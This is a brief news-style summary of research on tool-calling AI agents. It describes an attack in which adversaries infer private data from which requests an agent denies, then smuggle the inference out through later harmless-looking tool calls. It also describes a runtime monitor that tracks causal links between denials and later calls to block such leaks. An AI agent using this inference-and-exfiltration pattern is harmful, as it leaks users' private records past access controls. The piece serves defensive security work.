Tool-calling AI agents can leak secrets through denied requests — and now there's a runtime defense

A security vulnerability in AI agents that use external tools lets attackers infer private information from what the system refuses to do, then smuggle that inferred data out through later innocent-looking requests. Researchers built a runtime monitor that tracks causal chains between denied actions and subsequent tool calls, blocking the leak while adding negligible processing overhead.

AI agents deployed in production now routinely access private databases, invoke external APIs, and trigger real-world actions — everything from medical records to financial transfers. The vulnerability is that attackers don't need direct access to secrets; they can probe what the system refuses to execute, learn something from the denial itself, and exfiltrate that inference later. This matters because standard security tools (provenance tracking) only watch direct data flow, not the causal inferences that flow through denials. The runtime monitor closes that gap by tracking both pathways, which means organizations running production agents can now defend against a class of attack that existing security layers miss entirely.